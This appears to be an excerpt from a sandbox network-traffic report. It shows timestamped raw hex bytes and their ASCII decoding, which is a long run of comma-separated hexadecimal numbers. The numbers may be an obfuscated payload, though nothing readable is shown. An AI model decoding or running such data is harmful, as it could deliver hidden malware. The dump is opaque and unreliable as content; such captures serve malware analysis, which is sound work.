2c 31 36 65 2c 31 30 34 2c 33 37 2c 33 32 2c 34 31 2c 35 31 2c 64 38 2c 31 34 34 2c 36 61 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 66 64 2c 65
                                                                                                                                                                      Data Ascii: 42,a9,41,cc,96,6f,bf,b5,e0,a2,3e,138,c8,12c,c7,130,14d,16b,d4,70,153,9f,126,166,161,a2,66,cd,e3,75,d6,168,12e,b6,fe,10d,11d,12f,121,131,124,112,c3,85,94,47,146,f2,51,6c,4c,52,df,78,e4,68,e5,f9,45,f8,11a,e1,99,16e,104,37,32,41,51,d8,144,6a,58,46,38,39,fd,e
                                                                                                                                                                      2023-11-06 14:35:15 UTC58INData Raw: 2c 35 31 2c 31 36 32 2c 36 61 2c 31 34 35 2c 31 30 38 2c 38 36 2c 33 38 2c 31 32 34 2c 31 34 62 2c 63 36 2c 31 34 64 2c 31 32 64 2c 63 33 2c 37 65 2c 64 37 2c 39 37 2c 31 35 62 2c 64 66 2c 39 61 2c 36 62 2c 31 32 39 2c 33 64 2c 63 30 2c 63 34 2c 39 65 2c 36 64 2c 34 63 2c 37 37 2c 34 33 2c 33 34 2c 31 31 64 2c 31 30 35 2c 38 39 2c 63 30 2c 31 35 31 2c 64 39 2c 35 66 2c 64 31 2c 37 64 2c 31 33 31 2c 66 33 2c 61 33 2c 62 66 2c 31 32 65 2c 64 39 2c 31 33 32 2c 61 37 2c 31 31 62 2c 31 32 65 2c 64 66 2c 31 35 39 2c 62 63 2c 65 64 2c 31 32 34 2c 63 37 2c 31 36 30 2c 37 61 2c 31 30 65 2c 31 31 62 2c 62 38 2c 38 37 2c 33 34 2c 36 35 2c 31 30 36 2c 64 61 2c 61 38 2c 31 35 31 2c 62 38 2c 65 33 2c 61 33 2c 34 34 2c 38 66 2c 66 62 2c 62 38 2c 35 37 2c 38 38 2c 31 33
                                                                                                                                                                      Data Ascii: ,51,162,6a,145,108,86,38,124,14b,c6,14d,12d,c3,7e,d7,97,15b,df,9a,6b,129,3d,c0,c4,9e,6d,4c,77,43,34,11d,105,89,c0,151,d9,5f,d1,7d,131,f3,a3,bf,12e,d9,132,a7,11b,12e,df,159,bc,ed,124,c7,160,7a,10e,11b,b8,87,34,65,106,da,a8,151,b8,e3,a3,44,8f,fb,b8,57,88,13
                                                                                                                                                                      2023-11-06 14:35:15 UTC62INData Raw: 61 65 2c 38 36 2c 33 38 2c 63 36 2c 62 39 2c 34 33 2c 37 32 2c 31 30 32 2c 64 38 2c 37 32 2c 64 34 2c 35 39 2c 66 35 2c 39 61 2c 35 62 2c 31 32 38 2c 31 34 62 2c 33 61 2c 63 63 2c 62 62 2c 35 62 2c 66 30 2c 31 31 31 2c 37 39 2c 63 36 2c 66 62 2c 33 34 2c 63 34 2c 31 34 61 2c 36 62 2c 63 37 2c 31 30 62 2c 31 34 62 2c 65 62 2c 31 33 37 2c 35 64 2c 31 30 35 2c 66 37 2c 61 35 2c 37 31 2c 34 65 2c 66 63 2c 36 66 2c 31 32 33 2c 66 35 2c 35 61 2c 65 32 2c 36 65 2c 65 35 2c 66 65 2c 34 35 2c 31 33 35 2c 31 34 33 2c 36 66 2c 63 65 2c 31 33 65 2c 34 34 2c 62 37 2c 31 32 62 2c 34 39 2c 63 33 2c 65 62 2c 31 34 38 2c 31 30 61 2c 31 35 37 2c 36 61 2c 63 64 2c 65 64 2c 63 36 2c 38 33 2c 34 66 2c 62 65 2c 39 37 2c 36 63 2c 66 37 2c 61 38 2c 61 62 2c 35 34 2c 66 32 2c 62
                                                                                                                                                                      Data Ascii: ae,86,38,c6,b9,43,72,102,d8,72,d4,59,f5,9a,5b,128,14b,3a,cc,bb,5b,f0,111,79,c6,fb,34,c4,14a,6b,c7,10b,14b,eb,137,5d,105,f7,a5,71,4e,fc,6f,123,f5,5a,e2,6e,e5,fe,45,135,143,6f,ce,13e,44,b7,12b,49,c3,eb,148,10a,157,6a,cd,ed,c6,83,4f,be,97,6c,f7,a8,ab,54,f2,b
                                                                                                                                                                      2023-11-06 14:35:15 UTC63INData Raw: 33 38 2c 31 34 33 2c 39 38 2c 65 37 2c 62 64 2c 61 33 2c 62 37 2c 34 33 2c 63 34 2c 39 36 2c 39 38 2c 39 31 2c 36 33 2c 64 64 2c 62 63 2c 39 38 2c 34 36 2c 65 38 2c 39 30 2c 62 30 2c 34 33 2c 64 39 2c 37 37 2c 35 31 2c 38 66 2c 31 31 64 2c 64 61 2c 62 32 2c 35 37 2c 64 64 2c 31 35 35 2c 36 33 2c 66 39 2c 31 32 64 2c 37 36 2c 64 64 2c 31 35 63 2c 34 63 2c 66 61 2c 31 33 63 2c 33 63 2c 61 34 2c 66 33 2c 31 34 65 2c 31 35 36 2c 66 61 2c 31 36 31 2c 31 35 37 2c 36 61 2c 63 64 2c 38 39 2c 63 38 2c 38 33 2c 34 66 2c 62 65 2c 39 37 2c 36 63 2c 64 36 2c 39 38 2c 36 65 2c 37 37 2c 31 32 62 2c 65 66 2c 61 39 2c 33 62 2c 63 65 2c 62 61 2c 35 63 2c 31 32 65 2c 31 33 34 2c 37 39 2c 63 62 2c 37 62 2c 33 34 2c 63 34 2c 31 33 66 2c 36 35 2c 64 38 2c 31 35 34 2c 35 61 2c
                                                                                                                                                                      Data Ascii: 38,143,98,e7,bd,a3,b7,43,c4,96,98,91,63,dd,bc,98,46,e8,90,b0,43,d9,77,51,8f,11d,da,b2,57,dd,155,63,f9,12d,76,dd,15c,4c,fa,13c,3c,a4,f3,14e,156,fa,161,157,6a,cd,89,c8,83,4f,be,97,6c,d6,98,6e,77,12b,ef,a9,3b,ce,ba,5c,12e,134,79,cb,7b,34,c4,13f,65,d8,154,5a,
                                                                                                                                                                      2023-11-06 14:35:15 UTC67INData Raw: 39 66 2c 63 31 2c 37 65 2c 31 35 34 2c 31 30 61 2c 39 34 2c 31 32 64 2c 31 34 63 2c 31 36 62 2c 31 34 62 2c 31 35 31 2c 31 35 33 2c 62 33 2c 35 61 2c 36 37 2c 36 32 2c 63 33 2c 61 31 2c 31 35 38 2c 39 35 2c 31 34 63 2c 62 66 2c 38 38 2c 31 34 32 2c 61 39 2c 33 61 2c 39 38 2c 61 34 2c 31 34 62 2c 64 35 2c 31 31 64 2c 31 35 37 2c 31 34 35 2c 62 62 2c 66 64 2c 37 63 2c 37 65 2c 31 32 65 2c 61 36 2c 61 66 2c 63 32 2c 62 36 2c 35 61 2c 31 36 61 2c 38 39 2c 63 36 2c 62 31 2c 61 36 2c 33 38 2c 31 34 33 2c 38 39 2c 39 36 2c 31 31 64 2c 38 62 2c 37 37 2c 63 65 2c 31 30 63 2c 36 64 2c 31 32 30 2c 63 36 2c 61 66 2c 38 65 2c 61 32 2c 36 38 2c 39 35 2c 37 63 2c 33 39 2c 65 34 2c 37 36 2c 61 35 2c 31 31 39 2c 37 30 2c 31 33 64 2c 31 34 62 2c 31 35 31 2c 63 34 2c 64 39
                                                                                                                                                                      Data Ascii: 9f,c1,7e,154,10a,94,12d,14c,16b,14b,151,153,b3,5a,67,62,c3,a1,158,95,14c,bf,88,142,a9,3a,98,a4,14b,d5,11d,157,145,bb,fd,7c,7e,12e,a6,af,c2,b6,5a,16a,89,c6,b1,a6,38,143,89,96,11d,8b,77,ce,10c,6d,120,c6,af,8e,a2,68,95,7c,39,e4,76,a5,119,70,13d,14b,151,c4,d9
                                                                                                                                                                      2023-11-06 14:35:15 UTC71INData Raw: 2c 31 32 31 2c 64 34 2c 31 33 64 2c 31 34 65 2c 31 33 30 2c 61 37 2c 64 34 2c 35 35 2c 35 36 2c 36 62 2c 31 31 34 2c 31 35 39 2c 37 63 2c 31 32 61 2c 65 38 2c 38 34 2c 37 34 2c 61 61 2c 31 36 63 2c 36 30 2c 31 33 62 2c 66 33 2c 37 34 2c 33 32 2c 31 30 61 2c 31 31 34 2c 31 32 66 2c 61 61 2c 66 30 2c 31 34 34 2c 39 39 2c 38 65 2c 39 30 2c 63 35 2c 61 64 2c 34 66 2c 39 62 2c 34 65 2c 64 34 2c 65 30 2c 62 33 2c 61 62 2c 35 34 2c 31 35 39 2c 64 63 2c 36 61 2c 31 32 30 2c 61 65 2c 38 38 2c 35 61 2c 36 64 2c 61 38 2c 64 36 2c 61 31 2c 38 66 2c 62 64 2c 31 32 36 2c 61 65 2c 31 32 36 2c 65 30 2c 62 31 2c 37 63 2c 34 61 2c 31 32 66 2c 37 61 2c 37 34 2c 34 39 2c 34 66 2c 33 31 2c 34 65 2c 31 32 34 2c 34 64 2c 35 32 2c 36 62 2c 35 34 2c 63 65 2c 39 39 2c 65 64 2c 37
                                                                                                                                                                      Data Ascii: ,121,d4,13d,14e,130,a7,d4,55,56,6b,114,159,7c,12a,e8,84,74,aa,16c,60,13b,f3,74,32,10a,114,12f,aa,f0,144,99,8e,90,c5,ad,4f,9b,4e,d4,e0,b3,ab,54,159,dc,6a,120,ae,88,5a,6d,a8,d6,a1,8f,bd,126,ae,126,e0,b1,7c,4a,12f,7a,74,49,4f,31,4e,124,4d,52,6b,54,ce,99,ed,7
                                                                                                                                                                      2023-11-06 14:35:15 UTC75INData Raw: 2c 66 32 2c 31 34 65 2c 31 33 30 2c 61 37 2c 61 37 2c 31 30 66 2c 63 36 2c 37 34 2c 31 31 62 2c 35 61 2c 31 34 34 2c 31 33 66 2c 33 38 2c 34 34 2c 66 37 2c 31 31 61 2c 37 35 2c 64 36 2c 31 36 37 2c 31 32 65 2c 33 36 2c 36 35 2c 31 33 37 2c 38 63 2c 31 35 36 2c 63 39 2c 61 36 2c 31 35 37 2c 62 62 2c 31 33 30 2c 38 66 2c 63 37 2c 31 34 32 2c 63 34 2c 31 32 35 2c 31 34 64 2c 65 31 2c 35 38 2c 31 35 31 2c 65 30 2c 35 63 2c 31 35 39 2c 37 63 2c 31 35 65 2c 65 38 2c 38 34 2c 37 34 2c 64 66 2c 31 32 64 2c 62 66 2c 39 39 2c 39 36 2c 38 37 2c 36 62 2c 39 65 2c 36 64 2c 64 38 2c 35 39 2c 62 38 2c 61 62 2c 31 33 31 2c 33 65 2c 31 33 38 2c 65 35 2c 35 66 2c 31 34 65 2c 61 36 2c 36 36 2c 31 36 62 2c 63 31 2c 31 34 61 2c 63 31 2c 61 37 2c 31 35 39 2c 64 63 2c 38 32 2c
                                                                                                                                                                      Data Ascii: ,f2,14e,130,a7,a7,10f,c6,74,11b,5a,144,13f,38,44,f7,11a,75,d6,167,12e,36,65,137,8c,156,c9,a6,157,bb,130,8f,c7,142,c4,125,14d,e1,58,151,e0,5c,159,7c,15e,e8,84,74,df,12d,bf,99,96,87,6b,9e,6d,d8,59,b8,ab,131,3e,138,e5,5f,14e,a6,66,16b,c1,14a,c1,a7,159,dc,82,
                                                                                                                                                                      2023-11-06 14:35:15 UTC79INData Raw: 31 2c 31 33 37 2c 62 61 2c 64 34 2c 31 34 32 2c 37 64 2c 66 34 2c 31 37 36 2c 31 34 32 2c 31 33 33 2c 61 38 2c 61 35 2c 31 33 39 2c 36 62 2c 66 65 2c 31 36 34 2c 31 35 37 2c 31 34 35 2c 61 65 2c 61 31 2c 31 35 38 2c 34 33 2c 66 38 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 63 32 2c 62 65 2c 31 35 33 2c 31 34 63 2c 31 30 32 2c 31 36 36 2c 31 36 31 2c 31 33 37 2c 62 61 2c 65 34 2c 31 34 32 2c 31 35 64 2c 66 33 2c 31 37 36 2c 31 34 32 2c 31 33 33 2c 61 38 2c 62 35 2c 31 33 39 2c 31 34 62 2c 66 64 2c 31 36 34 2c 31 35 37 2c 31 34 35 2c 61 65 2c 62 31 2c 31 35 38 2c 31 32 33 2c 66 37 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 63 32 2c 63 65 2c 31 35 33 2c 31 32 63 2c 31 30 32 2c 31 36 36 2c 31 36 31 2c 62 62 2c 31 30 38 2c 62 34 2c 31 35 39 2c 31 32 33 2c 63 62 2c 37
                                                                                                                                                                      Data Ascii: 1,137,ba,d4,142,7d,f4,176,142,133,a8,a5,139,6b,fe,164,157,145,ae,a1,158,43,f8,130,14d,16b,c2,be,153,14c,102,166,161,137,ba,e4,142,15d,f3,176,142,133,a8,b5,139,14b,fd,164,157,145,ae,b1,158,123,f7,130,14d,16b,c2,ce,153,12c,102,166,161,bb,108,b4,159,123,cb,7
                                                                                                                                                                      2023-11-06 14:35:15 UTC83INData Raw: 30 2c 61 61 2c 36 34 2c 35 35 2c 62 63 2c 39 38 2c 37 31 2c 34 33 2c 34 66 2c 62 63 2c 38 33 2c 31 34 38 2c 66 63 2c 39 32 2c 36 62 2c 65 31 2c 61 37 2c 31 34 66 2c 62 33 2c 38 38 2c 31 34 33 2c 31 34 61 2c 65 35 2c 38 61 2c 31 34 33 2c 31 32 37 2c 38 33 2c 33 34 2c 62 37 2c 31 30 31 2c 63 35 2c 63 31 2c 64 38 2c 65 32 2c 31 34 30 2c 34 37 2c 61 64 2c 39 31 2c 66 64 2c 38 38 2c 31 33 37 2c 38 31 2c 31 34 64 2c 65 31 2c 35 38 2c 31 35 31 2c 31 34 31 2c 64 39 2c 31 31 61 2c 64 62 2c 61 64 2c 62 62 2c 63 31 2c 31 35 63 2c 35 62 2c 65 32 2c 39 30 2c 31 30 32 2c 62 38 2c 31 31 30 2c 66 39 2c 38 36 2c 31 32 35 2c 36 34 2c 35 35 2c 36 35 2c 35 38 2c 63 39 2c 31 33 36 2c 31 33 38 2c 65 35 2c 34 66 2c 31 34 65 2c 61 36 2c 31 32 36 2c 31 35 34 2c 61 30 2c 31 32 65
                                                                                                                                                                      Data Ascii: 0,aa,64,55,bc,98,71,43,4f,bc,83,148,fc,92,6b,e1,a7,14f,b3,88,143,14a,e5,8a,143,127,83,34,b7,101,c5,c1,d8,e2,140,47,ad,91,fd,88,137,81,14d,e1,58,151,141,d9,11a,db,ad,bb,c1,15c,5b,e2,90,102,b8,110,f9,86,125,64,55,65,58,c9,136,138,e5,4f,14e,a6,126,154,a0,12e
                                                                                                                                                                      2023-11-06 14:35:15 UTC87INData Raw: 37 2c 36 35 2c 36 38 2c 31 32 39 2c 31 33 31 2c 37 66 2c 63 34 2c 31 33 38 2c 63 65 2c 61 62 2c 35 35 2c 35 65 2c 66 37 2c 61 30 2c 37 36 2c 37 37 2c 64 66 2c 39 65 2c 38 62 2c 36 61 2c 31 30 39 2c 31 32 64 2c 31 34 35 2c 31 33 35 2c 31 33 65 2c 31 33 35 2c 31 34 38 2c 31 31 62 2c 33 66 2c 66 62 2c 62 36 2c 31 34 35 2c 31 35 61 2c 31 34 38 2c 66 30 2c 31 34 38 2c 31 33 64 2c 39 63 2c 35 64 2c 38 34 2c 63 65 2c 31 31 37 2c 62 63 2c 39 32 2c 39 30 2c 35 63 2c 31 34 39 2c 31 35 31 2c 35 37 2c 31 32 62 2c 64 39 2c 37 30 2c 37 33 2c 39 38 2c 39 38 2c 36 36 2c 65 34 2c 35 33 2c 65 39 2c 35 32 2c 36 66 2c 37 36 2c 36 35 2c 35 39 2c 64 39 2c 35 65 2c 62 33 2c 38 33 2c 38 61 2c 35 63 2c 34 39 2c 38 62 2c 39 37 2c 37 33 2c 34 35 2c 38 31 2c 31 34 37 2c 37 37 2c 39
                                                                                                                                                                      Data Ascii: 7,65,68,129,131,7f,c4,138,ce,ab,55,5e,f7,a0,76,77,df,9e,8b,6a,109,12d,145,135,13e,135,148,11b,3f,fb,b6,145,15a,148,f0,148,13d,9c,5d,84,ce,117,bc,92,90,5c,149,151,57,12b,d9,70,73,98,98,66,e4,53,e9,52,6f,76,65,59,d9,5e,b3,83,8a,5c,49,8b,97,73,45,81,147,77,9
                                                                                                                                                                      2023-11-06 14:35:15 UTC91INData Raw: 62 2c 36 39 2c 31 32 63 2c 62 36 2c 39 62 2c 38 30 2c 38 31 2c 62 38 2c 31 30 38 2c 63 38 2c 31 31 61 2c 34 65 2c 66 33 2c 63 31 2c 61 65 2c 31 33 30 2c 63 64 2c 38 35 2c 31 36 35 2c 65 39 2c 62 65 2c 63 32 2c 31 33 62 2c 62 34 2c 31 30 34 2c 39 33 2c 62 66 2c 38 62 2c 63 32 2c 61 35 2c 38 39 2c 39 39 2c 61 62 2c 61 36 2c 64 32 2c 31 31 66 2c 62 66 2c 64 65 2c 38 31 2c 62 38 2c 38 62 2c 61 30 2c 61 39 2c 38 37 2c 65 61 2c 31 31 31 2c 63 63 2c 38 63 2c 61 35 2c 63 37 2c 65 65 2c 65 33 2c 34 65 2c 31 30 62 2c 64 61 2c 62 31 2c 62 35 2c 39 33 2c 62 66 2c 39 34 2c 39 64 2c 38 33 2c 62 32 2c 31 31 36 2c 65 33 2c 35 65 2c 62 36 2c 62 38 2c 31 33 66 2c 38 39 2c 61 33 2c 63 31 2c 61 33 2c 34 66 2c 36 61 2c 63 62 2c 37 31 2c 38 35 2c 63 66 2c 62 63 2c 62 64 2c 31
                                                                                                                                                                      Data Ascii: b,69,12c,b6,9b,80,81,b8,108,c8,11a,4e,f3,c1,ae,130,cd,85,165,e9,be,c2,13b,b4,104,93,bf,8b,c2,a5,89,99,ab,a6,d2,11f,bf,de,81,b8,8b,a0,a9,87,ea,111,cc,8c,a5,c7,ee,e3,4e,10b,da,b1,b5,93,bf,94,9d,83,b2,116,e3,5e,b6,b8,13f,89,a3,c1,a3,4f,6a,cb,71,85,cf,bc,bd,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC95INData Raw: 38 31 2c 38 64 2c 66 35 2c 31 31 64 2c 37 64 2c 39 34 2c 63 30 2c 38 63 2c 37 63 2c 37 61 2c 38 39 2c 39 39 2c 63 30 2c 38 65 2c 31 32 32 2c 31 30 62 2c 35 36 2c 38 31 2c 38 32 2c 62 39 2c 31 30 38 2c 64 35 2c 37 38 2c 31 30 64 2c 31 31 66 2c 35 63 2c 39 62 2c 62 34 2c 39 64 2c 31 31 37 2c 31 32 61 2c 31 33 61 2c 38 31 2c 38 64 2c 62 64 2c 39 33 2c 66 65 2c 34 62 2c 62 39 2c 35 32 2c 65 66 2c 34 32 2c 38 61 2c 39 61 2c 61 63 2c 31 32 30 2c 31 35 65 2c 31 31 35 2c 66 39 2c 34 38 2c 38 32 2c 62 39 2c 38 63 2c 31 32 63 2c 61 37 2c 36 65 2c 31 32 39 2c 31 30 66 2c 31 33 36 2c 62 34 2c 39 64 2c 61 33 2c 31 32 34 2c 31 35 65 2c 37 30 2c 37 63 2c 31 36 62 2c 31 31 37 2c 31 32 30 2c 35 62 2c 63 30 2c 38 63 2c 37 64 2c 31 30 66 2c 62 37 2c 37 31 2c 31 32 30 2c 31
                                                                                                                                                                      Data Ascii: 81,8d,f5,11d,7d,94,c0,8c,7c,7a,89,99,c0,8e,122,10b,56,81,82,b9,108,d5,78,10d,11f,5c,9b,b4,9d,117,12a,13a,81,8d,bd,93,fe,4b,b9,52,ef,42,8a,9a,ac,120,15e,115,f9,48,82,b9,8c,12c,a7,6e,129,10f,136,b4,9d,a3,124,15e,70,7c,16b,117,120,5b,c0,8c,7d,10f,b7,71,120,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC99INData Raw: 31 2c 31 32 37 2c 39 61 2c 62 36 2c 39 34 2c 63 30 2c 31 30 30 2c 66 37 2c 37 36 2c 38 61 2c 39 61 2c 61 63 2c 31 31 34 2c 61 39 2c 31 30 66 2c 61 35 2c 31 33 37 2c 38 32 2c 62 39 2c 38 63 2c 61 65 2c 63 36 2c 39 38 2c 62 35 2c 39 35 2c 31 32 36 2c 61 65 2c 31 32 37 2c 39 66 2c 66 37 2c 65 37 2c 66 30 2c 64 34 2c 37 62 2c 38 65 2c 37 35 2c 39 33 2c 37 37 2c 38 63 2c 61 63 2c 62 33 2c 31 30 34 2c 39 64 2c 61 64 2c 39 65 2c 61 65 2c 61 30 2c 38 65 2c 38 30 2c 38 31 2c 63 64 2c 37 63 2c 31 30 63 2c 65 63 2c 39 61 2c 62 36 2c 39 35 2c 39 62 2c 31 33 30 2c 64 62 2c 61 31 2c 31 32 36 2c 31 31 64 2c 38 34 2c 38 65 2c 62 64 2c 61 33 2c 31 32 61 2c 66 65 2c 31 34 66 2c 38 63 2c 37 64 2c 37 62 2c 37 61 2c 65 32 2c 36 39 2c 39 37 2c 37 34 2c 31 31 62 2c 39 32 2c 38
                                                                                                                                                                      Data Ascii: 1,127,9a,b6,94,c0,100,f7,76,8a,9a,ac,114,a9,10f,a5,137,82,b9,8c,ae,c6,98,b5,95,126,ae,127,9f,f7,e7,f0,d4,7b,8e,75,93,77,8c,ac,b3,104,9d,ad,9e,ae,a0,8e,80,81,cd,7c,10c,ec,9a,b6,95,9b,130,db,a1,126,11d,84,8e,bd,a3,12a,fe,14f,8c,7d,7b,7a,e2,69,97,74,11b,92,8
                                                                                                                                                                      2023-11-06 14:35:15 UTC103INData Raw: 61 2c 65 30 2c 31 30 61 2c 62 34 2c 38 62 2c 39 36 2c 62 34 2c 39 34 2c 31 34 63 2c 62 63 2c 62 31 2c 61 62 2c 64 31 2c 31 36 30 2c 62 66 2c 63 36 2c 31 31 31 2c 31 31 66 2c 63 37 2c 36 66 2c 31 33 65 2c 61 30 2c 63 36 2c 37 61 2c 38 39 2c 39 39 2c 62 34 2c 63 64 2c 31 36 33 2c 31 31 66 2c 63 62 2c 63 32 2c 38 31 2c 62 38 2c 38 62 2c 61 30 2c 61 39 2c 31 34 38 2c 31 33 31 2c 63 36 2c 37 62 2c 31 33 30 2c 62 35 2c 31 35 37 2c 31 32 65 2c 63 63 2c 63 34 2c 38 63 2c 62 63 2c 61 32 2c 37 32 2c 31 34 34 2c 31 33 63 2c 63 38 2c 31 30 35 2c 38 33 2c 61 31 2c 31 31 36 2c 64 63 2c 31 34 64 2c 65 63 2c 63 65 2c 63 65 2c 34 30 2c 38 61 2c 63 39 2c 31 30 38 2c 61 66 2c 36 32 2c 35 34 2c 62 64 2c 62 39 2c 31 31 39 2c 66 30 2c 61 61 2c 61 32 2c 61 66 2c 61 61 2c 62 66
                                                                                                                                                                      Data Ascii: a,e0,10a,b4,8b,96,b4,94,14c,bc,b1,ab,d1,160,bf,c6,111,11f,c7,6f,13e,a0,c6,7a,89,99,b4,cd,163,11f,cb,c2,81,b8,8b,a0,a9,148,131,c6,7b,130,b5,157,12e,cc,c4,8c,bc,a2,72,144,13c,c8,105,83,a1,116,dc,14d,ec,ce,ce,40,8a,c9,108,af,62,54,bd,b9,119,f0,aa,a2,af,aa,bf
                                                                                                                                                                      2023-11-06 14:35:15 UTC108INData Raw: 63 33 2c 61 30 2c 64 62 2c 34 30 2c 39 35 2c 65 61 2c 31 31 66 2c 64 32 2c 36 33 2c 37 37 2c 39 34 2c 61 36 2c 66 37 2c 61 31 2c 37 39 2c 66 31 2c 61 65 2c 61 64 2c 61 30 2c 38 65 2c 37 62 2c 63 64 2c 62 38 2c 38 62 2c 39 37 2c 66 36 2c 61 62 2c 39 63 2c 31 31 31 2c 62 38 2c 31 34 30 2c 61 35 2c 64 32 2c 31 32 63 2c 63 61 2c 31 32 37 2c 39 35 2c 65 35 2c 61 62 2c 65 35 2c 39 63 2c 65 35 2c 34 34 2c 33 34 2c 36 62 2c 62 65 2c 64 38 2c 65 35 2c 65 37 2c 62 36 2c 64 30 2c 63 64 2c 62 61 2c 66 64 2c 66 37 2c 63 39 2c 34 66 2c 33 37 2c 31 34 37 2c 66 33 2c 62 61 2c 31 32 66 2c 61 65 2c 31 31 37 2c 61 32 2c 61 66 2c 61 61 2c 66 66 2c 61 35 2c 65 61 2c 61 32 2c 62 35 2c 39 33 2c 31 33 65 2c 39 64 2c 38 32 2c 37 61 2c 38 39 2c 39 39 2c 31 32 38 2c 62 62 2c 31 35
                                                                                                                                                                      Data Ascii: c3,a0,db,40,95,ea,11f,d2,63,77,94,a6,f7,a1,79,f1,ae,ad,a0,8e,7b,cd,b8,8b,97,f6,ab,9c,111,b8,140,a5,d2,12c,ca,127,95,e5,ab,e5,9c,e5,44,34,6b,be,d8,e5,e7,b6,d0,cd,ba,fd,f7,c9,4f,37,147,f3,ba,12f,ae,117,a2,af,aa,ff,a5,ea,a2,b5,93,13e,9d,82,7a,89,99,128,bb,15
                                                                                                                                                                      2023-11-06 14:35:15 UTC111INData Raw: 31 33 33 2c 31 30 37 2c 31 31 61 2c 33 66 2c 37 62 2c 31 30 64 2c 64 37 2c 37 65 2c 31 32 39 2c 37 62 2c 31 30 32 2c 39 37 2c 31 34 36 2c 31 34 62 2c 31 32 61 2c 65 66 2c 61 37 2c 31 31 33 2c 35 33 2c 31 32 61 2c 61 37 2c 31 34 38 2c 31 30 63 2c 31 37 30 2c 34 61 2c 34 33 2c 65 38 2c 39 36 2c 31 32 63 2c 31 33 34 2c 31 33 37 2c 37 30 2c 31 32 32 2c 63 65 2c 38 35 2c 31 31 34 2c 37 66 2c 66 39 2c 39 34 2c 31 30 63 2c 35 33 2c 31 32 61 2c 34 63 2c 35 32 2c 36 62 2c 64 63 2c 39 66 2c 31 34 32 2c 37 31 2c 65 65 2c 39 31 2c 31 34 66 2c 31 31 62 2c 31 36 36 2c 35 30 2c 38 36 2c 66 39 2c 38 39 2c 31 30 64 2c 31 30 32 2c 31 33 33 2c 36 36 2c 36 30 2c 31 32 66 2c 65 30 2c 39 33 2c 31 31 33 2c 34 38 2c 31 32 36 2c 38 38 2c 31 32 61 2c 31 32 38 2c 31 31 65 2c 66 34
                                                                                                                                                                      Data Ascii: 133,107,11a,3f,7b,10d,d7,7e,129,7b,102,97,146,14b,12a,ef,a7,113,53,12a,a7,148,10c,170,4a,43,e8,96,12c,134,137,70,122,ce,85,114,7f,f9,94,10c,53,12a,4c,52,6b,dc,9f,142,71,ee,91,14f,11b,166,50,86,f9,89,10d,102,133,66,60,12f,e0,93,113,48,126,88,12a,128,11e,f4
                                                                                                                                                                      2023-11-06 14:35:15 UTC115INData Raw: 2c 31 31 66 2c 36 66 2c 31 35 65 2c 31 34 64 2c 34 37 2c 31 30 63 2c 31 33 35 2c 31 33 30 2c 38 65 2c 35 30 2c 31 34 32 2c 34 33 2c 33 34 2c 33 32 2c 63 32 2c 31 33 38 2c 31 33 38 2c 35 35 2c 36 35 2c 35 38 2c 31 33 64 2c 31 32 37 2c 62 61 2c 31 33 66 2c 64 64 2c 34 66 2c 33 31 2c 34 65 2c 31 32 64 2c 31 32 36 2c 63 38 2c 37 30 2c 31 32 31 2c 35 61 2c 36 37 2c 36 32 2c 66 39 2c 31 32 32 2c 37 64 2c 64 64 2c 31 35 38 2c 39 63 2c 66 61 2c 31 32 31 2c 61 31 2c 31 32 39 2c 31 32 30 2c 39 39 2c 65 34 2c 31 34 34 2c 31 34 39 2c 35 38 2c 34 36 2c 33 38 2c 34 38 2c 31 33 62 2c 31 30 34 2c 31 31 35 2c 39 66 2c 31 34 35 2c 31 34 33 2c 31 33 34 2c 66 35 2c 31 36 34 2c 31 35 33 2c 31 35 39 2c 31 31 66 2c 64 62 2c 33 38 2c 34 34 2c 37 34 2c 61 32 2c 31 36 34 2c 31 32
                                                                                                                                                                      Data Ascii: ,11f,6f,15e,14d,47,10c,135,130,8e,50,142,43,34,32,c2,138,138,55,65,58,13d,127,ba,13f,dd,4f,31,4e,12d,126,c8,70,121,5a,67,62,f9,122,7d,dd,158,9c,fa,121,a1,129,120,99,e4,144,149,58,46,38,48,13b,104,115,9f,145,143,134,f5,164,153,159,11f,db,38,44,74,a2,164,12
                                                                                                                                                                      2023-11-06 14:35:15 UTC119INData Raw: 35 34 2c 39 65 2c 62 36 2c 61 66 2c 37 39 2c 38 64 2c 63 32 2c 37 61 2c 64 32 2c 62 64 2c 65 39 2c 62 32 2c 61 36 2c 33 66 2c 34 62 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 38 61 2c 36 66 2c 61 30 2c 37 36 2c 38 33 2c 33 65 2c 35 38 2c 61 64 2c 62 61 2c 37 32 2c 63 63 2c 63 34 2c 63 61 2c 64 33 2c 63 62 2c 39 62 2c 61 35 2c 65 38 2c 63 33 2c 64 63 2c 62 39 2c 39 37 2c 61 62 2c 39 35 2c 61 35 2c 36 31 2c 62 65 2c 63 34 2c 62 39 2c 63 61 2c 37 38 2c 61 37 2c 61 36 2c 35 39 2c 64 31 2c 62 37 2c 63 33 2c 39 36 2c 62 62 2c 64 63 2c 63 30 2c 37 32 2c 64 66 2c 63 33 2c 37 61 2c 64 33 2c 64 31 2c 39 39 2c 61 38 2c 39 34 2c 63 65 2c 64 35 2c 62 30 2c 39 37 2c 38 36 2c 35 34 2c 61 34 2c 62 36 2c 62 66 2c 64 37 2c 62 65 2c 64 32 2c 62 64 2c 36 36 2c
                                                                                                                                                                      Data Ascii: 54,9e,b6,af,79,8d,c2,7a,d2,bd,e9,b2,a6,3f,4b,51,63,55,65,58,46,8a,6f,a0,76,83,3e,58,ad,ba,72,cc,c4,ca,d3,cb,9b,a5,e8,c3,dc,b9,97,ab,95,a5,61,be,c4,b9,ca,78,a7,a6,59,d1,b7,c3,96,bb,dc,c0,72,df,c3,7a,d3,d1,99,a8,94,ce,d5,b0,97,86,54,a4,b6,bf,d7,be,d2,bd,66,
